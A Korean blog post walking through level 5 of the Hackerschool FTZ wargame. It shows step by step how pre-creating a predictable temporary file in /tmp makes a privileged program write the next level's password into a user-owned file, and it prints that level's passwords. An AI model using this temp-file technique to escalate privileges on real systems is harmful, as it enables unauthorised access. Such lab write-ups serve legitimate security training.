반응형
해커스쿨 FTZ [LEVEL5] 풀이
M4ndU
해커스쿨 FTZ [LEVEL5] 풀이입니다.
ID | level5
PW | what is your name?
으로 로그인합니다.
$ ls -l
를 이용해 어떤 파일과 어떤 폴더가 있는지 확인해 봅시다.
login as: level5
level5@192.168.31.128's password:
[level5@ftz level5]$ ls -l
total 12
-rw-r--r-- 1 root root 129 Mar 23 2000 hint
drwxr-xr-x 2 root level5 4096 Feb 24 2002 public_html
drwxrwx--- 2 root level5 4096 Jan 16 2009 tmp
hint 파일이 있습니다.
cat 명령어를 통해 hint 파일의 내용을 확인해 봅시다.
[level5@ftz level5]$ cat hint
/usr/bin/level5 프로그램은 /tmp 디렉토리에
level5.tmp 라는 이름의 임시파일을 생성한다.
이를 이용하여 level6의 권한을 얻어라.
/usr/bin/level5 프로그램이 /tmp 에 임시 파일을 생성한다고 합니다.
일단 /usr/bin/level5를 실행해 보겠습니다.
[level5@ftz level5]$ /usr/bin/level5
음.. /tmp로 가볼까요?
[level5@ftz bin]$ cd /tmp
[level5@ftz tmp]$ ls -l
total 0음... 아무것도 없네요. 아마 임시파일이라서 생성되었다가 사라지는 것 같습니다.
그럼 직접 /tmp에 level5.tmp라는 파일을 만들어두고 /usr/bin/level5 를 실행하면 level5.tmp에 덮어쓰기가 일어나지 않을까요?
한번 해봅시다.
[level5@ftz tmp]$ cat > level5.tmp
hi
[level5@ftz tmp]$ /usr/bin/level5
cat 명령어로 level5.tmp를 만들고 /usr/bin/level5를 실행했습니다.
그리고 다시 level5.tmp를 cat명령어로 보면?
[level5@ftz tmp]$ cat level5.tmp
next password : what the hell
다음 패스워드가 뜨네요!
가즈아ㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏ
반응형
'System Hacking > FTZ' 카테고리의 다른 글
| 해커스쿨 FTZ [LEVEL7] 풀이 (0) | 2018.02.07 |
|---|---|
| 해커스쿨 FTZ [LEVEL6] 풀이 (0) | 2018.02.07 |
| 해커스쿨 FTZ [LEVEL4] 풀이 (0) | 2018.02.07 |
| 해커스쿨 FTZ [LEVEL3] 풀이 (0) | 2018.02.07 |
| 해커스쿨 FTZ [LEVEL2] 풀이 (0) | 2018.02.07 |